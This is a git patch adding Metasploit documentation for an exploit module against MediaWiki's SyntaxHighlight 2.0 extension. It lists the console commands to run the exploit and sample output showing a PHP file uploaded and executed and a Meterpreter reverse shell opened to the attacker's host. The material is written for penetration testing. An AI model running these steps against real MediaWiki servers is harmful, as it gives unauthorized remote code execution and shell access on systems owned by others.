From 0eb79e8c8cdc9b2fef61ca8cab3f1dc93de79b77 Mon Sep 17 00:00:00 2001 From: Yorick Koster Date: Sat, 29 Apr 2017 16:14:25 +0200 Subject: [PATCH] Added docs for mediawiki_syntaxhighlight.rb --- .../multi/http/mediawiki_syntaxhighlight.md | 30 +++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md diff --git a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md new file mode 100644 index 0000000000..3fceaa9f79 --- /dev/null +++ b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md @@ -0,0 +1,30 @@ +## Vulnerable Application + + Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. This issue was supposed to be fixed in MediaWiki version 1.28.1 and version 1.27.2. It appears that the fix was pushed to the git repository, but for some reason it was not included in the release packages. + +## Verification Steps + + 1. `use exploit/multi/http/mediawiki_syntaxhighlight` + 2. `set RHOST ` + 3. `set TARGETURI ` + 4. `set UPLOADPATH ` + 5. optionally set `RPORT`, `SSL`, and `VHOST` + 6. `exploit` + 7. **Verify** a new Meterpreter session is started + +## Sample Output + +``` +msf > use exploit/multi/http/mediawiki_syntaxhighlight +msf exploit(mediawiki_syntaxhighlight) > set RHOST 192.168.146.137 +RHOST => 192.168.146.137 +msf exploit(mediawiki_syntaxhighlight) > set TARGETURI /mediawiki +TARGETURI => /mediawiki +msf exploit(mediawiki_syntaxhighlight) > exploit + +[*] Started reverse TCP handler on 192.168.146.197:4444 +[*] Local PHP file: images/bwpqtiqgmeydivskjcjltnldb.php +[*] Trying to run /mediawiki/images/bwpqtiqgmeydivskjcjltnldb.php +[*] Sending stage (33986 bytes) to 192.168.146.137 +[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.137:55768) at 2017-04-29 14:27:03 +0200 +``` \ No newline at end of file